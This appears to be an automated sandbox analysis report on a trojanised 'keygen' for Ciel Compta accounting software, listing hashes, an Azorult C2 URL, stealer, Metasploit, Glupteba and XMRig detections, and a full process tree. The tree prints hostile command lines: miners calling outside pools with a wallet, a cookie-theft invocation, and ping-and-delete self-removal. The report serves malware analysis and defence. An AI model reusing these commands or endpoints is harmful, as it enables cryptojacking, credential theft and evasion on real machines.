Analysis
-
max time kernel
8s -
max time network
61s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:41
Static task
static1
Behavioral task
behavioral1
Sample
Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
Resource
win10v20201028
General
-
Target
Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
-
Size
5.2MB
-
MD5
8d35cf69c1aca35ce0852f7376102627
-
SHA1
268f27a272d1b6696a9e4abb9270706e0a4cc099
-
SHA256
f2ca37f7eb8b9eb1e4eaa55ff92f57cf07107962f53eb58d9471e1c9b296de81
-
SHA512
4156091c5618f1ad50a15a1cca6852353e4b5da9a21203d834c8e163d30d765b74ffde806ec08b6579a5b13f0fd9a0831426452723ea9407ecae858fb1b0ad98
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral1/memory/5820-195-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral1/memory/5124-149-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/5124-150-0x00000001402CA898-mapping.dmp xmrig behavioral1/memory/5124-167-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral1/memory/5124-223-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 4176 keygen-pr.exe 4200 keygen-step-1.exe 3292 keygen-step-3.exe 3984 keygen-step-4.exe 584 key.exe 4576 Setup.exe 1896 multitimer.exe 2264 setups.exe 2424 askinstall20.exe 2648 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2648 setups.tmp 2648 setups.tmp 2648 setups.tmp 2648 setups.tmp 2648 setups.tmp 2648 setups.tmp 2648 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 149 ipinfo.io 151 ipinfo.io 195 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 1352 taskkill.exe 4468 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 1464 PING.EXE 2480 PING.EXE 5236 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 159 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2648 setups.tmp 2648 setups.tmp -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 4576 Setup.exe Token: SeCreateTokenPrivilege 2424 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2424 askinstall20.exe Token: SeLockMemoryPrivilege 2424 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2424 askinstall20.exe Token: SeMachineAccountPrivilege 2424 askinstall20.exe Token: SeTcbPrivilege 2424 askinstall20.exe Token: SeSecurityPrivilege 2424 askinstall20.exe Token: SeTakeOwnershipPrivilege 2424 askinstall20.exe Token: SeLoadDriverPrivilege 2424 askinstall20.exe Token: SeSystemProfilePrivilege 2424 askinstall20.exe Token: SeSystemtimePrivilege 2424 askinstall20.exe Token: SeProfSingleProcessPrivilege 2424 askinstall20.exe Token: SeIncBasePriorityPrivilege 2424 askinstall20.exe Token: SeCreatePagefilePrivilege 2424 askinstall20.exe Token: SeCreatePermanentPrivilege 2424 askinstall20.exe Token: SeBackupPrivilege 2424 askinstall20.exe Token: SeRestorePrivilege 2424 askinstall20.exe Token: SeShutdownPrivilege 2424 askinstall20.exe Token: SeDebugPrivilege 2424 askinstall20.exe Token: SeAuditPrivilege 2424 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2424 askinstall20.exe Token: SeChangeNotifyPrivilege 2424 askinstall20.exe Token: SeRemoteShutdownPrivilege 2424 askinstall20.exe Token: SeUndockPrivilege 2424 askinstall20.exe Token: SeSyncAgentPrivilege 2424 askinstall20.exe Token: SeEnableDelegationPrivilege 2424 askinstall20.exe Token: SeManageVolumePrivilege 2424 askinstall20.exe Token: SeImpersonatePrivilege 2424 askinstall20.exe Token: SeCreateGlobalPrivilege 2424 askinstall20.exe Token: 31 2424 askinstall20.exe Token: 32 2424 askinstall20.exe Token: 33 2424 askinstall20.exe Token: 34 2424 askinstall20.exe Token: 35 2424 askinstall20.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2264 setups.exe 2648 setups.tmp -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 4704 wrote to memory of 3636 4704 Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe 75 PID 4704 wrote to memory of 3636 4704 Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe 75 PID 4704 wrote to memory of 3636 4704 Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe 75 PID 3636 wrote to memory of 4176 3636 cmd.exe 78 PID 3636 wrote to memory of 4176 3636 cmd.exe 78 PID 3636 wrote to memory of 4176 3636 cmd.exe 78 PID 3636 wrote to memory of 4200 3636 cmd.exe 79 PID 3636 wrote to memory of 4200 3636 cmd.exe 79 PID 3636 wrote to memory of 4200 3636 cmd.exe 79 PID 3636 wrote to memory of 3292 3636 cmd.exe 80 PID 3636 wrote to memory of 3292 3636 cmd.exe 80 PID 3636 wrote to memory of 3292 3636 cmd.exe 80 PID 3636 wrote to memory of 3984 3636 cmd.exe 81 PID 3636 wrote to memory of 3984 3636 cmd.exe 81 PID 3636 wrote to memory of 3984 3636 cmd.exe 81 PID 4176 wrote to memory of 584 4176 keygen-pr.exe 82 PID 4176 wrote to memory of 584 4176 keygen-pr.exe 82 PID 4176 wrote to memory of 584 4176 keygen-pr.exe 82 PID 3984 wrote to memory of 4576 3984 keygen-step-4.exe 83 PID 3984 wrote to memory of 4576 3984 keygen-step-4.exe 83 PID 3292 wrote to memory of 1240 3292 keygen-step-3.exe 85 PID 3292 wrote to memory of 1240 3292 keygen-step-3.exe 85 PID 3292 wrote to memory of 1240 3292 keygen-step-3.exe 85 PID 584 wrote to memory of 1288 584 key.exe 84 PID 584 wrote to memory of 1288 584 key.exe 84 PID 584 wrote to memory of 1288 584 key.exe 84 PID 1240 wrote to memory of 1464 1240 cmd.exe 87 PID 1240 wrote to memory of 1464 1240 cmd.exe 87 PID 1240 wrote to memory of 1464 1240 cmd.exe 87 PID 4576 wrote to memory of 1896 4576 Setup.exe 88 PID 4576 wrote to memory of 1896 4576 Setup.exe 88 PID 4576 wrote to memory of 2264 4576 Setup.exe 89 PID 4576 wrote to memory of 2264 4576 Setup.exe 89 PID 4576 wrote to memory of 2264 4576 Setup.exe 89 PID 3984 wrote to memory of 2424 3984 keygen-step-4.exe 90 PID 3984 wrote to memory of 2424 3984 keygen-step-4.exe 90 PID 3984 wrote to memory of 2424 3984 keygen-step-4.exe 90 PID 2264 wrote to memory of 2648 2264 setups.exe 91 PID 2264 wrote to memory of 2648 2264 setups.exe 91 PID 2264 wrote to memory of 2648 2264 setups.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 1 3.1617536499.6069a5f3cfac4 1016⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 2 3.1617536499.6069a5f3cfac47⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe"C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe" /VERYSILENT8⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-JK79P.tmp\fd1yklpc2qy.tmp"C:\Users\Admin\AppData\Local\Temp\is-JK79P.tmp\fd1yklpc2qy.tmp" /SL5="$70112,2592217,780800,C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe" /VERYSILENT9⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\is-TF65C.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-TF65C.tmp\winlthsth.exe"10⤵PID:6036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jkfoojgqn5i\app.exe"C:\Users\Admin\AppData\Local\Temp\jkfoojgqn5i\app.exe" /8-238⤵PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe" /Verysilent /subid=5778⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\is-IBAH7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-IBAH7.tmp\Setup3310.tmp" /SL5="$20254,138429,56832,C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe" /Verysilent /subid=5779⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\is-SB242.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SB242.tmp\Setup.exe" /Verysilent10⤵PID:5040
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4284
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5564
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\is-KDODU.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KDODU.tmp\LabPicV3.tmp" /SL5="$2031C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:2056
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:3172
-
C:\Users\Admin\AppData\Local\Temp\is-TPD0B.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-TPD0B.tmp\lylal220.tmp" /SL5="$20316,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5636
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:1388
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:5536
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:4032
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:212
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:3504
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵PID:5816
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5812
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5792
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\is-S461O.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-S461O.tmp\IBInstaller_97039.tmp" /SL5="$3041A,14574507,721408,C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5452
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QVQEC.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5620
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-QVQEC.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:3916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe"C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe" /quiet SILENT=1 AF=7568⤵PID:5516
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277430 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe"C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe" /silent /subid=4828⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe"C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe" /ustwo INSTALL8⤵PID:5964
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "2lp3mo2uzsc.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe" & exit9⤵PID:1776
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2lp3mo2uzsc.exe" /f10⤵
- Kills process with taskkill
PID:4468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ztwnbnkbl0j\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ztwnbnkbl0j\cpyrix.exe" /VERYSILENT8⤵PID:5912
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:4620
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe"C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe"8⤵PID:5836
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe"9⤵PID:4172
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe"C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe" /VERYSILENT /id=5358⤵PID:5804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe"C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\is-6O0BM.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6O0BM.tmp\setups.tmp" /SL5="$50056,454998,229376,C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:1352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:1044
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:1972
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:2288
-
C:\Users\Admin\AppData\Roaming\67A9.tmp.exe"C:\Users\Admin\AppData\Roaming\67A9.tmp.exe"5⤵PID:4196
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:184
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5124
-
-
-
C:\Users\Admin\AppData\Roaming\6894.tmp.exe"C:\Users\Admin\AppData\Roaming\6894.tmp.exe"5⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:2092
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:2480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4088
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4964
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3996
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\is-B7PI4.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-B7PI4.tmp\vict.tmp" /SL5="$30274,870426,780800,C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe" /VERYSILENT /id=5351⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\is-SJ48A.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-SJ48A.tmp\win1host.exe" 5352⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\x4cZKmOP0.exe"C:\Users\Admin\AppData\Local\Temp\x4cZKmOP0.exe"3⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1B3OV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-1B3OV.tmp\vpn.tmp" /SL5="$401D4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe" /silent /subid=4821⤵PID:5180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:4288
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5576
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2632
-
